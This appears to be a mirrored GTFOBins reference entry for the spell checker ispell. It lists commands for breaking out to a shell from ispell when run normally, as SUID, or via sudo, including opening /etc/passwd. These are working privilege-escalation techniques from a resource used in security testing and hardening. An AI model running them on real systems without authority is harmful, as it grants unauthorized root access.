mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
16 lines
228 B
Markdown
16 lines
228 B
Markdown
|
---
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: |
|
||
|
ispell /etc/passwd
|
||
|
!/bin/sh
|
||
|
suid:
|
||
|
- code: |
|
||
|
./ispell /etc/passwd
|
||
|
!/bin/sh -p
|
||
|
sudo:
|
||
|
- code: |
|
||
|
sudo ispell /etc/passwd
|
||
|
!/bin/sh
|
||
|
---
|